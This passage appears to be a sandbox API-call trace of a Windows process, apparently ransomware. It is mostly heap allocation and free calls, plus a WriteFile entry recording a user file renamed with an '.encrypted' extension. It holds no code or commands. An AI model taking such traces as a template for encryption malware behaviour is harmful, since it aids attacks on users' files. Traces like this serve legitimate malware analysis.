[0041.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0041.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0041.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.encrypted.gif\r\n", cchWideChar=69, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 69 [0041.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x45) returned 0x88e138 [0041.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.encrypted.gif\r\n", cchWideChar=69, lpMultiByteStr=0x88e138, cbMultiByte=69, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\phhv1rvP we R.encrypted.gif\r\n", lpUsedDefaultChar=0x0) returned 69 [0041.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0041.389] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0041.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0041.389] WriteFile (in: hFile=0x140, lpBuffer=0x7f3630*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3630*, lpNumberOfBytesWritten=0x6aee3c*=0x44, lpOverlapped=0x0) returned 1 [0041.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0041.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.389] CloseHandle (hObject=0x140) returned 1 [0041.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0041.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0041.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0041.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0041.394] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0041.394] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0041.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0041.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0041.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0041.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0041.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0041.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0041.395] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0041.395] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.395] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0041.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0041.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.395] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0041.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0041.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4c8 [0041.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0041.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0041.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0041.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0041.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c808 [0041.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0041.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0041.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0041.396] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0041.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0041.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0041.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0041.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0041.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0041.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0041.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0041.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0041.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0041.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0041.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0041.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0041.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0041.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0041.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0041.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0041.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0041.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0041.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0041.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0041.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0041.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0041.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0041.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0041.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0041.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0041.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0041.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0041.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0041.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0041.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0041.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0041.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0041.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0041.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0041.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0041.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0041.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0041.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0041.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0041.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0041.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0041.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0041.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0041.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0041.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0041.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0041.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0041.399] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0041.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0041.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0041.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0041.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0041.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: 